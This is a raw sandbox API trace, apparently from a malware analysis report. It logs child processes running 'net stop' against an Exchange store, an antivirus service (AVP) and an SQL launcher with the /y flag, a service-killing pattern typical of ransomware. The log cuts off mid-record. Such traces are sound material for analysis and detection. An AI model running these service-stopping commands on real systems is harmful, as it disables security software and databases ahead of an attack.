[0213.570] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.570] GetConsoleOutputCP () returned 0x1b5 [0213.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x229080 | out: lpCPInfo=0x229080) returned 1 [0213.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.573] sprintf_s (in: _DstBuf=0x1cf744, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0213.573] setlocale (category=0, locale=".437") returned="English_United States.437" [0213.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0213.575] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0213.575] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0213.575] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf510, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0213.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6c) returned 0x6b3c10 [0213.575] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0213.575] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf714 | out: Buffer=0x1cf714*=0x6b1c70) returned 0x0 [0213.575] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf714 | out: Buffer=0x1cf714*=0x6b1c88) returned 0x0 [0213.575] _fileno (_File=0x74eb2900) returned -2 [0213.575] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0213.576] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0213.576] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0213.576] _wcsicmp (_String1="config", _String2="stop") returned -16 [0213.576] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0213.576] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0213.576] _wcsicmp (_String1="file", _String2="stop") returned -13 [0213.576] _wcsicmp (_String1="files", _String2="stop") returned -13 [0213.576] _wcsicmp (_String1="group", _String2="stop") returned -12 [0213.576] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0213.576] _wcsicmp (_String1="help", _String2="stop") returned -11 [0213.576] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0213.576] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0213.576] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0213.576] _wcsicmp (_String1="session", _String2="stop") returned -15 [0213.576] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0213.576] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0213.576] _wcsicmp (_String1="share", _String2="stop") returned -12 [0213.576] _wcsicmp (_String1="start", _String2="stop") returned -14 [0213.576] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0213.576] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0213.576] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0213.576] _wcsicmp (_String1="accounts", _String2="MSExchangeIS") returned -12 [0213.576] _wcsicmp (_String1="computer", _String2="MSExchangeIS") returned -10 [0213.576] _wcsicmp (_String1="config", _String2="MSExchangeIS") returned -10 [0213.576] _wcsicmp (_String1="continue", _String2="MSExchangeIS") returned -10 [0213.576] _wcsicmp (_String1="cont", _String2="MSExchangeIS") returned -10 [0213.576] _wcsicmp (_String1="file", _String2="MSExchangeIS") returned -7 [0213.576] _wcsicmp (_String1="files", _String2="MSExchangeIS") returned -7 [0213.576] _wcsicmp (_String1="group", _String2="MSExchangeIS") returned -6 [0213.576] _wcsicmp (_String1="groups", _String2="MSExchangeIS") returned -6 [0213.576] _wcsicmp (_String1="help", _String2="MSExchangeIS") returned -5 [0213.576] _wcsicmp (_String1="helpmsg", _String2="MSExchangeIS") returned -5 [0213.576] _wcsicmp (_String1="localgroup", _String2="MSExchangeIS") returned -1 [0213.576] _wcsicmp (_String1="pause", _String2="MSExchangeIS") returned 3 [0213.576] _wcsicmp (_String1="session", _String2="MSExchangeIS") returned 6 [0213.576] _wcsicmp (_String1="sessions", _String2="MSExchangeIS") returned 6 [0213.576] _wcsicmp (_String1="sess", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="share", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="start", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="stats", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="statistics", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="stop", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="time", _String2="MSExchangeIS") returned 7 [0213.577] _wcsicmp (_String1="user", _String2="MSExchangeIS") returned 8 [0213.577] _wcsicmp (_String1="users", _String2="MSExchangeIS") returned 8 [0213.577] _wcsicmp (_String1="msg", _String2="MSExchangeIS") returned 2 [0213.577] _wcsicmp (_String1="messenger", _String2="MSExchangeIS") returned -14 [0213.577] _wcsicmp (_String1="receiver", _String2="MSExchangeIS") returned 5 [0213.577] _wcsicmp (_String1="rcv", _String2="MSExchangeIS") returned 5 [0213.577] _wcsicmp (_String1="netpopup", _String2="MSExchangeIS") returned 1 [0213.577] _wcsicmp (_String1="redirector", _String2="MSExchangeIS") returned 5 [0213.577] _wcsicmp (_String1="redir", _String2="MSExchangeIS") returned 5 [0213.577] _wcsicmp (_String1="rdr", _String2="MSExchangeIS") returned 5 [0213.577] _wcsicmp (_String1="workstation", _String2="MSExchangeIS") returned 10 [0213.577] _wcsicmp (_String1="work", _String2="MSExchangeIS") returned 10 [0213.577] _wcsicmp (_String1="wksta", _String2="MSExchangeIS") returned 10 [0213.577] _wcsicmp (_String1="prdr", _String2="MSExchangeIS") returned 3 [0213.577] _wcsicmp (_String1="devrdr", _String2="MSExchangeIS") returned -9 [0213.577] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeIS") returned -1 [0213.577] _wcsicmp (_String1="server", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="svr", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="srv", _String2="MSExchangeIS") returned 6 [0213.577] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeIS") returned -1 [0213.577] _wcsicmp (_String1="alerter", _String2="MSExchangeIS") returned -12 [0213.577] _wcsicmp (_String1="netlogon", _String2="MSExchangeIS") returned 1 [0213.577] _wcsupr (in: _String="MSExchangeIS" | out: _String="MSEXCHANGEIS") returned="MSEXCHANGEIS" [0213.578] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6b54d0 [0213.580] GetServiceKeyNameW (in: hSCManager=0x6b54d0, lpDisplayName="MSEXCHANGEIS", lpServiceName=0x22aaf0, lpcchBuffer=0x1cf6b0 | out: lpServiceName="", lpcchBuffer=0x1cf6b0) returned 0 [0213.580] _wcsicmp (_String1="msg", _String2="MSEXCHANGEIS") returned 2 [0213.581] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEIS") returned -14 [0213.581] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEIS") returned 5 [0213.581] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEIS") returned 5 [0213.581] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEIS") returned 5 [0213.581] _wcsicmp (_String1="redir", _String2="MSEXCHANGEIS") returned 5 [0213.581] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEIS") returned 5 [0213.581] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEIS") returned 10 [0213.581] _wcsicmp (_String1="work", _String2="MSEXCHANGEIS") returned 10 [0213.581] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEIS") returned 10 [0213.581] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEIS") returned 3 [0213.581] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEIS") returned -9 [0213.581] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEIS") returned -1 [0213.581] _wcsicmp (_String1="server", _String2="MSEXCHANGEIS") returned 6 [0213.581] _wcsicmp (_String1="svr", _String2="MSEXCHANGEIS") returned 6 [0213.581] _wcsicmp (_String1="srv", _String2="MSEXCHANGEIS") returned 6 [0213.581] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEIS") returned -1 [0213.581] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEIS") returned -12 [0213.581] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEIS") returned 1 [0213.581] NetServiceControl (in: servername=0x0, service="MSEXCHANGEIS", opcode=0x0, arg=0x0, bufptr=0x1cf6ac | out: bufptr=0x1cf6ac) returned 0x889 [0213.582] wcscpy_s (in: _Destination=0x22a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0213.582] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0213.583] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x22b338, nSize=0x800, Arguments=0x229dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0213.584] GetFileType (hFile=0x26c) returned 0x3 [0213.584] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6b4000 [0213.584] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6b4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0213.584] WriteFile (in: hFile=0x26c, lpBuffer=0x6b4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cf5ec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf5ec, lpOverlapped=0x0) returned 0 [0213.584] LocalFree (hMem=0x6b4000) returned 0x0 [0213.584] GetFileType (hFile=0x26c) returned 0x3 [0213.584] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6b62a8 [0213.584] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6b62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nk", lpUsedDefaultChar=0x0) returned 2 [0213.584] WriteFile (in: hFile=0x26c, lpBuffer=0x6b62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf5ec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf5ec, lpOverlapped=0x0) returned 0 [0213.584] LocalFree (hMem=0x6b62a8) returned 0x0 [0213.584] _ultow (in: _Dest=0x889, _Radix=1898012 | out: _Dest=0x889) returned="2185" [0213.584] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x22b338, nSize=0x800, Arguments=0x229dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0213.584] GetFileType (hFile=0x26c) returned 0x3 [0213.584] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6b62a8 [0213.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6b62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0213.585] WriteFile (in: hFile=0x26c, lpBuffer=0x6b62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf5f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf5f8, lpOverlapped=0x0) returned 0 [0213.585] LocalFree (hMem=0x6b62a8) returned 0x0 [0213.585] GetFileType (hFile=0x26c) returned 0x3 [0213.585] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6b62a8 [0213.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6b62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nk", lpUsedDefaultChar=0x0) returned 2 [0213.585] WriteFile (in: hFile=0x26c, lpBuffer=0x6b62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf5f8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf5f8, lpOverlapped=0x0) returned 0 [0213.585] LocalFree (hMem=0x6b62a8) returned 0x0 [0213.585] NetApiBufferFree (Buffer=0x6b1c70) returned 0x0 [0213.585] NetApiBufferFree (Buffer=0x6b1c88) returned 0x0 [0213.585] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS /y" [0213.586] exit (_Code=2) Process: id = "322" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c5e9000" os_pid = "0xab0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop AVP /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 495 os_tid = 0xafc Process: id = "323" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4d8be000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xab0" cmd_line = "C:\\Windows\\system32\\net1 stop AVP /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 496 os_tid = 0x760 [0213.728] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff8b4 | out: lpSystemTimeAsFileTime=0x1ff8b4*(dwLowDateTime=0x48953fa0, dwHighDateTime=0x1d57a87)) [0213.728] GetCurrentProcessId () returned 0xb70 [0213.728] GetCurrentThreadId () returned 0x760 [0213.728] GetTickCount () returned 0x116effa [0213.728] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff8ac | out: lpPerformanceCount=0x1ff8ac*=33401298593) returned 1 [0213.729] GetModuleHandleA (lpModuleName=0x0) returned 0x720000 [0213.729] __set_app_type (_Type=0x1) [0213.729] __p__fmode () returned 0x74eb31f4 [0213.729] __p__commode () returned 0x74eb31fc [0213.729] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x72ffe6) returned 0x0 [0213.729] __getmainargs (in: _Argc=0x739064, _Argv=0x73906c, _Env=0x739068, _DoWildCard=0, _StartInfo=0x739024 | out: _Argc=0x739064, _Argv=0x73906c, _Env=0x739068) returned 0 [0213.729] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.729] GetConsoleOutputCP () returned 0x1b5 [0213.729] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x739080 | out: lpCPInfo=0x739080) returned 1 [0213.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.732] sprintf_s (in: _DstBuf=0x1ff86c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0213.733] setlocale (category=0, locale=".437") returned="English_United States.437" [0213.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0213.734] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0213.734] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AVP /y" [0213.734] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff638, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0213.735] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c3bf0 [0213.735] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0213.735] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff83c | out: Buffer=0x1ff83c*=0x5c1c50) returned 0x0 [0213.735] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff83c | out: Buffer=0x1ff83c*=0x5c1c68) returned 0x0 [0213.735] _fileno (_File=0x74eb2900) returned -2 [0213.735] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0213.735] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0213.735] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0213.735] _wcsicmp (_String1="config", _String2="stop") returned -16 [0213.735] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0213.735] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0213.735] _wcsicmp (_String1="file", _String2="stop") returned -13 [0213.735] _wcsicmp (_String1="files", _String2="stop") returned -13 [0213.735] _wcsicmp (_String1="group", _String2="stop") returned -12 [0213.735] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0213.735] _wcsicmp (_String1="help", _String2="stop") returned -11 [0213.735] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0213.735] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0213.736] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0213.736] _wcsicmp (_String1="session", _String2="stop") returned -15 [0213.736] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0213.736] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0213.736] _wcsicmp (_String1="share", _String2="stop") returned -12 [0213.736] _wcsicmp (_String1="start", _String2="stop") returned -14 [0213.736] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0213.736] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0213.736] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0213.736] _wcsicmp (_String1="accounts", _String2="AVP") returned -19 [0213.736] _wcsicmp (_String1="computer", _String2="AVP") returned 2 [0213.736] _wcsicmp (_String1="config", _String2="AVP") returned 2 [0213.736] _wcsicmp (_String1="continue", _String2="AVP") returned 2 [0213.736] _wcsicmp (_String1="cont", _String2="AVP") returned 2 [0213.736] _wcsicmp (_String1="file", _String2="AVP") returned 5 [0213.736] _wcsicmp (_String1="files", _String2="AVP") returned 5 [0213.736] _wcsicmp (_String1="group", _String2="AVP") returned 6 [0213.736] _wcsicmp (_String1="groups", _String2="AVP") returned 6 [0213.736] _wcsicmp (_String1="help", _String2="AVP") returned 7 [0213.736] _wcsicmp (_String1="helpmsg", _String2="AVP") returned 7 [0213.736] _wcsicmp (_String1="localgroup", _String2="AVP") returned 11 [0213.736] _wcsicmp (_String1="pause", _String2="AVP") returned 15 [0213.736] _wcsicmp (_String1="session", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="sessions", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="sess", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="share", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="start", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="stats", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="statistics", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="stop", _String2="AVP") returned 18 [0213.736] _wcsicmp (_String1="time", _String2="AVP") returned 19 [0213.736] _wcsicmp (_String1="user", _String2="AVP") returned 20 [0213.736] _wcsicmp (_String1="users", _String2="AVP") returned 20 [0213.736] _wcsicmp (_String1="msg", _String2="AVP") returned 12 [0213.736] _wcsicmp (_String1="messenger", _String2="AVP") returned 12 [0213.736] _wcsicmp (_String1="receiver", _String2="AVP") returned 17 [0213.736] _wcsicmp (_String1="rcv", _String2="AVP") returned 17 [0213.737] _wcsicmp (_String1="netpopup", _String2="AVP") returned 13 [0213.737] _wcsicmp (_String1="redirector", _String2="AVP") returned 17 [0213.737] _wcsicmp (_String1="redir", _String2="AVP") returned 17 [0213.737] _wcsicmp (_String1="rdr", _String2="AVP") returned 17 [0213.737] _wcsicmp (_String1="workstation", _String2="AVP") returned 22 [0213.737] _wcsicmp (_String1="work", _String2="AVP") returned 22 [0213.737] _wcsicmp (_String1="wksta", _String2="AVP") returned 22 [0213.737] _wcsicmp (_String1="prdr", _String2="AVP") returned 15 [0213.737] _wcsicmp (_String1="devrdr", _String2="AVP") returned 3 [0213.737] _wcsicmp (_String1="lanmanworkstation", _String2="AVP") returned 11 [0213.737] _wcsicmp (_String1="server", _String2="AVP") returned 18 [0213.737] _wcsicmp (_String1="svr", _String2="AVP") returned 18 [0213.737] _wcsicmp (_String1="srv", _String2="AVP") returned 18 [0213.737] _wcsicmp (_String1="lanmanserver", _String2="AVP") returned 11 [0213.737] _wcsicmp (_String1="alerter", _String2="AVP") returned -10 [0213.737] _wcsicmp (_String1="netlogon", _String2="AVP") returned 13 [0213.737] _wcsupr (in: _String="AVP" | out: _String="AVP") returned="AVP" [0213.737] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54a0 [0213.740] GetServiceKeyNameW (in: hSCManager=0x5c54a0, lpDisplayName="AVP", lpServiceName=0x73aaf0, lpcchBuffer=0x1ff7d8 | out: lpServiceName="", lpcchBuffer=0x1ff7d8) returned 0 [0213.740] _wcsicmp (_String1="msg", _String2="AVP") returned 12 [0213.740] _wcsicmp (_String1="messenger", _String2="AVP") returned 12 [0213.740] _wcsicmp (_String1="receiver", _String2="AVP") returned 17 [0213.740] _wcsicmp (_String1="rcv", _String2="AVP") returned 17 [0213.741] _wcsicmp (_String1="redirector", _String2="AVP") returned 17 [0213.741] _wcsicmp (_String1="redir", _String2="AVP") returned 17 [0213.741] _wcsicmp (_String1="rdr", _String2="AVP") returned 17 [0213.741] _wcsicmp (_String1="workstation", _String2="AVP") returned 22 [0213.741] _wcsicmp (_String1="work", _String2="AVP") returned 22 [0213.741] _wcsicmp (_String1="wksta", _String2="AVP") returned 22 [0213.741] _wcsicmp (_String1="prdr", _String2="AVP") returned 15 [0213.741] _wcsicmp (_String1="devrdr", _String2="AVP") returned 3 [0213.741] _wcsicmp (_String1="lanmanworkstation", _String2="AVP") returned 11 [0213.741] _wcsicmp (_String1="server", _String2="AVP") returned 18 [0213.741] _wcsicmp (_String1="svr", _String2="AVP") returned 18 [0213.741] _wcsicmp (_String1="srv", _String2="AVP") returned 18 [0213.741] _wcsicmp (_String1="lanmanserver", _String2="AVP") returned 11 [0213.741] _wcsicmp (_String1="alerter", _String2="AVP") returned -10 [0213.741] _wcsicmp (_String1="netlogon", _String2="AVP") returned 13 [0213.741] NetServiceControl (in: servername=0x0, service="AVP", opcode=0x0, arg=0x0, bufptr=0x1ff7d4 | out: bufptr=0x1ff7d4) returned 0x889 [0213.742] wcscpy_s (in: _Destination=0x73a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0213.742] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0213.742] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x73b338, nSize=0x800, Arguments=0x739dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0213.744] GetFileType (hFile=0x26c) returned 0x3 [0213.744] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5c3fd0 [0213.744] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5c3fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0213.744] WriteFile (in: hFile=0x26c, lpBuffer=0x5c3fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ff714, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff714, lpOverlapped=0x0) returned 0 [0213.744] LocalFree (hMem=0x5c3fd0) returned 0x0 [0213.744] GetFileType (hFile=0x26c) returned 0x3 [0213.744] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6278 [0213.744] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0213.744] WriteFile (in: hFile=0x26c, lpBuffer=0x5c6278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff714, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff714, lpOverlapped=0x0) returned 0 [0213.744] LocalFree (hMem=0x5c6278) returned 0x0 [0213.744] _ultow (in: _Dest=0x889, _Radix=2094916 | out: _Dest=0x889) returned="2185" [0213.744] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x73b338, nSize=0x800, Arguments=0x739dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0213.744] GetFileType (hFile=0x26c) returned 0x3 [0213.744] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5c6278 [0213.744] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5c6278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0213.744] WriteFile (in: hFile=0x26c, lpBuffer=0x5c6278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ff720, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff720, lpOverlapped=0x0) returned 0 [0213.744] LocalFree (hMem=0x5c6278) returned 0x0 [0213.744] GetFileType (hFile=0x26c) returned 0x3 [0213.744] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6278 [0213.744] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0213.745] WriteFile (in: hFile=0x26c, lpBuffer=0x5c6278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff720, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff720, lpOverlapped=0x0) returned 0 [0213.745] LocalFree (hMem=0x5c6278) returned 0x0 [0213.745] NetApiBufferFree (Buffer=0x5c1c50) returned 0x0 [0213.745] NetApiBufferFree (Buffer=0x5c1c68) returned 0x0 [0213.745] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AVP /y" [0213.745] exit (_Code=2) Process: id = "324" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7b0ee000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 497 os_tid = 0xb64 Process: id = "325" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6bf79000" os_pid = "0x498" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "324" os_parent_pid = "0xb68" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = 